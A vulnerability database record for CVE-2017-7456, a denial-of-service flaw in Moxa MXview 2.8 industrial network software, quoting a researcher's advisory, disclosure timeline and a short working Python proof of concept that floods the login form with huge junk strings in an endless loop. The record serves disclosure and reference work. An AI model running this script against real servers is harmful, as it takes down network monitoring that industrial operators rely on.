ID

VAR-E-201704-0047


CVE

cve_id:CVE-2017-7456

Trust: 1.5

sources: PACKETSTORM: 142075 // EXPLOIT-DB: 41851

EDB ID

41851


TITLE

Moxa MXview 2.8 - Denial of Service - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41851

DESCRIPTION

Moxa MXview 2.8 - Denial of Service. CVE-2017-7456 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 41851

AFFECTED PRODUCTS

vendor:moxamodel:mxviewscope:eqversion:2.8

Trust: 2.1

sources: PACKETSTORM: 142075 // EXPLOIT-DB: 41851 // EDBNET: 92489

EXPLOIT

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
============
www.moxa.com

Product:
===========
MXView v2.8

Download:
http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.

Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
CVE-2017-7456

Security Issue:
================
Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.

Exploit/POC:
=============
import urllib,urllib2

print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'

IP=raw_input("[Moxa MXView IP]>")

PAYLOAD="A"*200000000

url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})

while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

Trust: 1.0

sources: EXPLOIT-DB: 41851

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 41851

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41851

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 41851 // EDBNET: 92489

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 142075

CREDITS

hyp3rlinx

Trust: 0.6

sources: EXPLOIT-DB: 41851

EXTERNAL IDS

db:EXPLOIT-DBid:41851

Trust: 1.6

db:NVDid:CVE-2017-7456

Trust: 1.5

db:EDBNETid:92489

Trust: 0.6

db:PACKETSTORMid:142075

Trust: 0.5

sources: PACKETSTORM: 142075 // EXPLOIT-DB: 41851 // EDBNET: 92489

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-7456

Trust: 1.5

url:https://www.exploit-db.com/exploits/41851/

Trust: 0.6

sources: PACKETSTORM: 142075 // EXPLOIT-DB: 41851 // EDBNET: 92489

SOURCES

db:PACKETSTORMid:142075
db:EXPLOIT-DBid:41851
db:EDBNETid:92489

LAST UPDATE DATE

2022-07-27T10:02:52.406000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:142075date:2017-04-10T13:43:33
db:EXPLOIT-DBid:41851date:2017-04-10T00:00:00
db:EDBNETid:92489date:2017-04-10T00:00:00